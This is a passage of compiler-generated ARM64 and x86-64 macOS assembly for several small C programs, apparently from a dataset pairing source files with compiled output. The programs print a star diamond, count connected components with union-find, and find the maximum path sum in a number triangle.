LBB0_15 LBB0_15: ; =>This Loop Header: Depth=1 ; Child Loop BB0_17 Depth 2 ; Child Loop BB0_21 Depth 2 ldur w8, [x29, #-12] subs w8, w8, #0 cset w8, le tbnz w8, #0, LBB0_26 b LBB0_16 LBB0_16: ; in Loop: Header=BB0_15 Depth=1 mov w8, #1 str w8, [sp, #16] b LBB0_17 LBB0_17: ; Parent Loop BB0_15 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] ldur w9, [x29, #-8] ldur w10, [x29, #-12] subs w9, w9, w10 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_20 b LBB0_18 LBB0_18: ; in Loop: Header=BB0_17 Depth=2 adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf b LBB0_19 LBB0_19: ; in Loop: Header=BB0_17 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_17 LBB0_20: ; in Loop: Header=BB0_15 Depth=1 mov w8, #1 str w8, [sp, #16] b LBB0_21 LBB0_21: ; Parent Loop BB0_15 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_24 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_21 Depth=2 adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB0_23 LBB0_23: ; in Loop: Header=BB0_21 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB0_21 LBB0_24: ; in Loop: Header=BB0_15 Depth=1 adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _printf b LBB0_25 LBB0_25: ; in Loop: Header=BB0_15 Depth=1 ldur w8, [x29, #-12] subs w8, w8, #1 stur w8, [x29, #-12] b LBB0_15 LBB0_26: stur wzr, [x29, #-4] b LBB0_27 LBB0_27: ldur w0, [x29, #-4] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz " " l_.str.2: ; @.str.2 .asciz "*" l_.str.3: ; @.str.3 .asciz "\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl %eax, -20(%rbp) cmpl $1, -20(%rbp) je LBB0_2 ## %bb.1: movl $1, -4(%rbp) jmp LBB0_27 LBB0_2: movl $1, -12(%rbp) LBB0_3: ## =>This Loop Header: Depth=1 ## Child Loop BB0_5 Depth 2 ## Child Loop BB0_9 Depth 2 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jg LBB0_14 ## %bb.4: ## in Loop: Header=BB0_3 Depth=1 movl $1, -16(%rbp) LBB0_5: ## Parent Loop BB0_3 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax movl -8(%rbp), %ecx subl -12(%rbp), %ecx cmpl %ecx, %eax jg LBB0_8 ## %bb.6: ## in Loop: Header=BB0_5 Depth=2 leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.7: ## in Loop: Header=BB0_5 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_5 LBB0_8: ## in Loop: Header=BB0_3 Depth=1 movl $1, -16(%rbp) LBB0_9: ## Parent Loop BB0_3 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_12 ## %bb.10: ## in Loop: Header=BB0_9 Depth=2 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.11: ## in Loop: Header=BB0_9 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_9 LBB0_12: ## in Loop: Header=BB0_3 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.13: ## in Loop: Header=BB0_3 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB0_3 LBB0_14: movl -8(%rbp), %eax subl $1, %eax movl %eax, -12(%rbp) LBB0_15: ## =>This Loop Header: Depth=1 ## Child Loop BB0_17 Depth 2 ## Child Loop BB0_21 Depth 2 cmpl $0, -12(%rbp) jle LBB0_26 ## %bb.16: ## in Loop: Header=BB0_15 Depth=1 movl $1, -16(%rbp) LBB0_17: ## Parent Loop BB0_15 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax movl -8(%rbp), %ecx subl -12(%rbp), %ecx cmpl %ecx, %eax jg LBB0_20 ## %bb.18: ## in Loop: Header=BB0_17 Depth=2 leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf ## %bb.19: ## in Loop: Header=BB0_17 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_17 LBB0_20: ## in Loop: Header=BB0_15 Depth=1 movl $1, -16(%rbp) LBB0_21: ## Parent Loop BB0_15 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jg LBB0_24 ## %bb.22: ## in Loop: Header=BB0_21 Depth=2 leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf ## %bb.23: ## in Loop: Header=BB0_21 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB0_21 LBB0_24: ## in Loop: Header=BB0_15 Depth=1 leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf ## %bb.25: ## in Loop: Header=BB0_15 Depth=1 movl -12(%rbp), %eax addl $-1, %eax movl %eax, -12(%rbp) jmp LBB0_15 LBB0_26: movl $0, -4(%rbp) LBB0_27: movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz " " L_.str.2: ## @.str.2 .asciz "*" L_.str.3: ## @.str.3 .asciz "\n" .subsections_via_symbols
the_stack_data/51449.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _find ; -- Begin function find .p2align 2 _find: ; @find .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #12] ldr w8, [sp, #12] str w8, [sp, #8] b LBB0_1 LBB0_1: ; =>This Inner Loop Header: Depth=1 ldrsw x9, [sp, #8] adrp x8, _set@GOTPAGE ldr x8, [x8, _set@GOTPAGEOFF] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #8] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 ldrsw x9, [sp, #8] adrp x8, _set@GOTPAGE ldr x8, [x8, _set@GOTPAGEOFF] ldr w8, [x8, x9, lsl #2] str w8, [sp, #8] b LBB0_1 LBB0_3: ldr w0, [sp, #8] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _merge ; -- Begin function merge .p2align 2 _merge: ; @merge .cfi_startproc ; %bb.0: sub sp, sp, #32 .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] str w1, [sp, #8] ldur w0, [x29, #-4] bl _find str w0, [sp, #4] ldr w0, [sp, #8] bl _find str w0, [sp] ldr w8, [sp, #4] ldr w9, [sp] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: ldr w8, [sp] ldrsw x10, [sp, #4] adrp x9, _set@GOTPAGE ldr x9, [x9, _set@GOTPAGEOFF] str w8, [x9, x10, lsl #2] b LBB1_2 LBB1_2: ldp x29, x30, [sp, #16] ; 16-byte Folded Reload add sp, sp, #32 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] stur w0, [x29, #-8] stur x1, [x29, #-16] b LBB2_1 LBB2_1: ; =>This Loop Header: Depth=1 ; Child Loop BB2_6 Depth 2 ; Child Loop BB2_10 Depth 2 ; Child Loop BB2_14 Depth 2 mov x9, sp sub x8, x29, #20 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf subs w8, w0, #0 cset w8, eq mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB2_4 b LBB2_2 LBB2_2: ; in Loop: Header=BB2_1 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #0 cset w8, eq mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB2_4 b LBB2_3 LBB2_3: ; in Loop: Header=BB2_1 Depth=1 mov x9, sp sub x8, x29, #24 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf subs w8, w0, #0 cset w8, ne str w8, [sp, #20] ; 4-byte Folded Spill b LBB2_4 LBB2_4: ; in Loop: Header=BB2_1 Depth=1 ldr w8, [sp, #20] ; 4-byte Folded Reload tbz w8, #0, LBB2_20 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_1 Depth=1 mov w8, #1 str w8, [sp, #28] b LBB2_6 LBB2_6: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #28] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB2_9 b LBB2_7 LBB2_7: ; in Loop: Header=BB2_6 Depth=2 ldr w8, [sp, #28] ldrsw x10, [sp, #28] adrp x9, _set@GOTPAGE ldr x9, [x9, _set@GOTPAGEOFF] str w8, [x9, x10, lsl #2] b LBB2_8 LBB2_8: ; in Loop: Header=BB2_6 Depth=2 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB2_6 LBB2_9: ; in Loop: Header=BB2_1 Depth=1 mov w8, #1 str w8, [sp, #28] b LBB2_10 LBB2_10: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #28] ldur w9, [x29, #-24] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB2_13 b LBB2_11 LBB2_11: ; in Loop: Header=BB2_10 Depth=2 mov x9, sp sub x8, x29, #28 str x8, [x9] add x8, sp, #32 str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf ldur w0, [x29, #-28] ldr w1, [sp, #32] bl _merge b LBB2_12 LBB2_12: ; in Loop: Header=BB2_10 Depth=2 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB2_10 LBB2_13: ; in Loop: Header=BB2_1 Depth=1 mov w8, #-1 str w8, [sp, #24] mov w8, #1 str w8, [sp, #28] b LBB2_14 LBB2_14: ; Parent Loop BB2_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #28] ldur w9, [x29, #-20] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB2_19 b LBB2_15 LBB2_15: ; in Loop: Header=BB2_14 Depth=2 ldrsw x9, [sp, #28] adrp x8, _set@GOTPAGE ldr x8, [x8, _set@GOTPAGEOFF] ldr w8, [x8, x9, lsl #2] ldr w9, [sp, #28] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB2_17 b LBB2_16 LBB2_16: ; in Loop: Header=BB2_14 Depth=2 ldr w8, [sp, #24] add w8, w8, #1 str w8, [sp, #24] b LBB2_17 LBB2_17: ; in Loop: Header=BB2_14 Depth=2 b LBB2_18 LBB2_18: ; in Loop: Header=BB2_14 Depth=2 ldr w8, [sp, #28] add w8, w8, #1 str w8, [sp, #28] b LBB2_14 LBB2_19: ; in Loop: Header=BB2_1 Depth=1 ldr w9, [sp, #24] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB2_1 LBB2_20: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .comm _set,4008,2 ; @set .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%d %d" l_.str.2: ; @.str.2 .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _find ## -- Begin function find .p2align 4, 0x90 _find: ## @find .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -4(%rbp) movl -4(%rbp), %eax movl %eax, -8(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movslq -8(%rbp), %rcx movq _set@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax cmpl -8(%rbp), %eax je LBB0_3 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movslq -8(%rbp), %rcx movq _set@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax movl %eax, -8(%rbp) jmp LBB0_1 LBB0_3: movl -8(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _merge ## -- Begin function merge .p2align 4, 0x90 _merge: ## @merge .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl %edi, -4(%rbp) movl %esi, -8(%rbp) movl -4(%rbp), %edi callq _find movl %eax, -12(%rbp) movl -8(%rbp), %edi callq _find movl %eax, -16(%rbp) movl -12(%rbp), %eax cmpl -16(%rbp), %eax je LBB1_2 ## %bb.1: movl -16(%rbp), %edx movslq -12(%rbp), %rcx movq _set@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) LBB1_2: addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) LBB2_1: ## =>This Loop Header: Depth=1 ## Child Loop BB2_6 Depth 2 ## Child Loop BB2_10 Depth 2 ## Child Loop BB2_14 Depth 2 leaq L_.str(%rip), %rdi leaq -20(%rbp), %rsi movb $0, %al callq _scanf movl %eax, %ecx xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, %ecx movb %al, -41(%rbp) ## 1-byte Spill je LBB2_4 ## %bb.2: ## in Loop: Header=BB2_1 Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $0, -20(%rbp) movb %al, -41(%rbp) ## 1-byte Spill je LBB2_4 ## %bb.3: ## in Loop: Header=BB2_1 Depth=1 leaq L_.str(%rip), %rdi leaq -24(%rbp), %rsi movb $0, %al callq _scanf cmpl $0, %eax setne %al movb %al, -41(%rbp) ## 1-byte Spill LBB2_4: ## in Loop: Header=BB2_1 Depth=1 movb -41(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB2_5 jmp LBB2_20 LBB2_5: ## in Loop: Header=BB2_1 Depth=1 movl $1, -36(%rbp) LBB2_6: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -36(%rbp), %eax cmpl -20(%rbp), %eax jg LBB2_9 ## %bb.7: ## in Loop: Header=BB2_6 Depth=2 movl -36(%rbp), %edx movslq -36(%rbp), %rcx movq _set@GOTPCREL(%rip), %rax movl %edx, (%rax,%rcx,4) ## %bb.8: ## in Loop: Header=BB2_6 Depth=2 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB2_6 LBB2_9: ## in Loop: Header=BB2_1 Depth=1 movl $1, -36(%rbp) LBB2_10: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -36(%rbp), %eax cmpl -24(%rbp), %eax jg LBB2_13 ## %bb.11: ## in Loop: Header=BB2_10 Depth=2 leaq L_.str.1(%rip), %rdi leaq -28(%rbp), %rsi leaq -32(%rbp), %rdx movb $0, %al callq _scanf movl -28(%rbp), %edi movl -32(%rbp), %esi callq _merge ## %bb.12: ## in Loop: Header=BB2_10 Depth=2 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB2_10 LBB2_13: ## in Loop: Header=BB2_1 Depth=1 movl $-1, -40(%rbp) movl $1, -36(%rbp) LBB2_14: ## Parent Loop BB2_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -36(%rbp), %eax cmpl -20(%rbp), %eax jg LBB2_19 ## %bb.15: ## in Loop: Header=BB2_14 Depth=2 movslq -36(%rbp), %rcx movq _set@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax cmpl -36(%rbp), %eax jne LBB2_17 ## %bb.16: ## in Loop: Header=BB2_14 Depth=2 movl -40(%rbp), %eax addl $1, %eax movl %eax, -40(%rbp) LBB2_17: ## in Loop: Header=BB2_14 Depth=2 jmp LBB2_18 LBB2_18: ## in Loop: Header=BB2_14 Depth=2 movl -36(%rbp), %eax addl $1, %eax movl %eax, -36(%rbp) jmp LBB2_14 LBB2_19: ## in Loop: Header=BB2_1 Depth=1 movl -40(%rbp), %esi leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf jmp LBB2_1 LBB2_20: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .comm _set,4008,4 ## @set .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%d %d" L_.str.2: ## @.str.2 .asciz "%d\n" .subsections_via_symbols
the_stack_data/891977.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _max ; -- Begin function max .p2align 2 _max: ; @max .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str w0, [sp, #8] str w1, [sp, #4] ldr w8, [sp, #8] ldr w9, [sp, #4] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: ldr w8, [sp, #8] str w8, [sp, #12] b LBB0_3 LBB0_2: ldr w8, [sp, #4] str w8, [sp, #12] b LBB0_3 LBB0_3: ldr w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _triangle@GOTPAGE ldr x8, [x8, _triangle@GOTPAGEOFF] str x8, [sp, #16] ; 8-byte Folded Spill stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf mov w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_1: ; =>This Loop Header: Depth=1 ; Child Loop BB1_3 Depth 2 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_8 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 mov w8, #1 stur w8, [x29, #-16] b LBB1_3 LBB1_3: ; Parent Loop BB1_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_6 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=2 ldr x8, [sp, #16] ; 8-byte Folded Reload ldursw x9, [x29, #-12] mov x10, #408 mul x9, x9, x10 add x8, x8, x9 ldursw x9, [x29, #-16] add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=2 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB1_3 LBB1_6: ; in Loop: Header=BB1_1 Depth=1 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_1 LBB1_8: mov w8, #2 stur w8, [x29, #-12] b LBB1_9 LBB1_9: ; =>This Loop Header: Depth=1 ; Child Loop BB1_11 Depth 2 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_16 b LBB1_10 LBB1_10: ; in Loop: Header=BB1_9 Depth=1 mov w8, #1 stur w8, [x29, #-16] b LBB1_11 LBB1_11: ; Parent Loop BB1_9 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-16] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_14 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_11 Depth=2 ldr x10, [sp, #16] ; 8-byte Folded Reload ldur w8, [x29, #-12] subs w8, w8, #1 mov x9, #408 str x9, [sp, #8] ; 8-byte Folded Spill mov x11, x10 mov w9, #408 smaddl x8, w8, w9, x11 ldur w9, [x29, #-16] subs w9, w9, #1 ldr w0, [x8, w9, sxtw #2] ldur w8, [x29, #-12] subs w8, w8, #1 mov w9, #408 smaddl x8, w8, w9, x10 ldursw x9, [x29, #-16] ldr w1, [x8, x9, lsl #2] bl _max ldr x10, [sp, #8] ; 8-byte Folded Reload ldr x8, [sp, #16] ; 8-byte Folded Reload ldursw x9, [x29, #-12] mul x9, x9, x10 add x8, x8, x9 ldursw x9, [x29, #-16] add x9, x8, x9, lsl #2 ldr w8, [x9] add w8, w8, w0 str w8, [x9] b LBB1_13 LBB1_13: ; in Loop: Header=BB1_11 Depth=2 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB1_11 LBB1_14: ; in Loop: Header=BB1_9 Depth=1 b LBB1_15 LBB1_15: ; in Loop: Header=BB1_9 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_9 LBB1_16: stur wzr, [x29, #-20] mov w8, #1 stur w8, [x29, #-12] b LBB1_17 LBB1_17: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_22 b LBB1_18 LBB1_18: ; in Loop: Header=BB1_17 Depth=1 ldr x9, [sp, #16] ; 8-byte Folded Reload ldur w8, [x29, #-20] ldursw x10, [x29, #-8] mov x11, #408 mul x10, x10, x11 add x9, x9, x10 ldursw x10, [x29, #-12] ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_20 b LBB1_19 LBB1_19: ; in Loop: Header=BB1_17 Depth=1 ldr x8, [sp, #16] ; 8-byte Folded Reload ldursw x9, [x29, #-8] mov x10, #408 mul x9, x9, x10 add x8, x8, x9 ldursw x9, [x29, #-12] ldr w8, [x8, x9, lsl #2] stur w8, [x29, #-20] b LBB1_20 LBB1_20: ; in Loop: Header=BB1_17 Depth=1 b LBB1_21 LBB1_21: ; in Loop: Header=BB1_17 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB1_17 LBB1_22: ldur w9, [x29, #-20] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" .comm _triangle,41616,2 ; @triangle l_.str.1: ; @.str.1 .asciz "%d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _max ## -- Begin function max .p2align 4, 0x90 _max: ## @max .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movl %edi, -8(%rbp) movl %esi, -12(%rbp) movl -8(%rbp), %eax cmpl -12(%rbp), %eax jl LBB0_2 ## %bb.1: movl -8(%rbp), %eax movl %eax, -4(%rbp) jmp LBB0_3 LBB0_2: movl -12(%rbp), %eax movl %eax, -4(%rbp) LBB0_3: movl -4(%rbp), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $1, -12(%rbp) LBB1_1: ## =>This Loop Header: Depth=1 ## Child Loop BB1_3 Depth 2 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jg LBB1_8 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movl $1, -16(%rbp) LBB1_3: ## Parent Loop BB1_1 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jg LBB1_6 ## %bb.4: ## in Loop: Header=BB1_3 Depth=2 movslq -12(%rbp), %rax movq _triangle@GOTPCREL(%rip), %rsi imulq $408, %rax, %rax ## imm = 0x198 addq %rax, %rsi movslq -16(%rbp), %rax shlq $2, %rax addq %rax, %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _scanf ## %bb.5: ## in Loop: Header=BB1_3 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_3 LBB1_6: ## in Loop: Header=BB1_1 Depth=1 jmp LBB1_7 LBB1_7: ## in Loop: Header=BB1_1 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_1 LBB1_8: movl $2, -12(%rbp) LBB1_9: ## =>This Loop Header: Depth=1 ## Child Loop BB1_11 Depth 2 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jg LBB1_16 ## %bb.10: ## in Loop: Header=BB1_9 Depth=1 movl $1, -16(%rbp) LBB1_11: ## Parent Loop BB1_9 Depth=1 ## => This Inner Loop Header: Depth=2 movl -16(%rbp), %eax cmpl -12(%rbp), %eax jg LBB1_14 ## %bb.12: ## in Loop: Header=BB1_11 Depth=2 movl -12(%rbp), %eax subl $1, %eax movslq %eax, %rcx movq _triangle@GOTPCREL(%rip), %rax imulq $408, %rcx, %rcx ## imm = 0x198 addq %rcx, %rax movl -16(%rbp), %ecx subl $1, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %edi movl -12(%rbp), %eax subl $1, %eax movslq %eax, %rcx movq _triangle@GOTPCREL(%rip), %rax imulq $408, %rcx, %rcx ## imm = 0x198 addq %rcx, %rax movslq -16(%rbp), %rcx movl (%rax,%rcx,4), %esi callq _max movl %eax, %edx movslq -12(%rbp), %rcx movq _triangle@GOTPCREL(%rip), %rax imulq $408, %rcx, %rcx ## imm = 0x198 addq %rcx, %rax movslq -16(%rbp), %rcx addl (%rax,%rcx,4), %edx movl %edx, (%rax,%rcx,4) ## %bb.13: ## in Loop: Header=BB1_11 Depth=2 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_11 LBB1_14: ## in Loop: Header=BB1_9 Depth=1 jmp LBB1_15 LBB1_15: ## in Loop: Header=BB1_9 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_9 LBB1_16: movl $0, -20(%rbp) movl $1, -12(%rbp) LBB1_17: ## =>This Inner Loop Header: Depth=1 movl -12(%rbp), %eax cmpl -8(%rbp), %eax jg LBB1_22 ## %bb.18: ## in Loop: Header=BB1_17 Depth=1 movl -20(%rbp), %eax movslq -8(%rbp), %rdx movq _triangle@GOTPCREL(%rip), %rcx imulq $408, %rdx, %rdx ## imm = 0x198 addq %rdx, %rcx movslq -12(%rbp), %rdx cmpl (%rcx,%rdx,4), %eax jge LBB1_20 ## %bb.19: ## in Loop: Header=BB1_17 Depth=1 movslq -8(%rbp), %rcx movq _triangle@GOTPCREL(%rip), %rax imulq $408, %rcx, %rcx ## imm = 0x198 addq %rcx, %rax movslq -12(%rbp), %rcx movl (%rax,%rcx,4), %eax movl %eax, -20(%rbp) LBB1_20: ## in Loop: Header=BB1_17 Depth=1 jmp LBB1_21 LBB1_21: ## in Loop: Header=BB1_17 Depth=1 movl -12(%rbp), %eax addl $1, %eax movl %eax, -12(%rbp) jmp LBB1_17 LBB1_22: movl -20(%rbp), %esi leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq 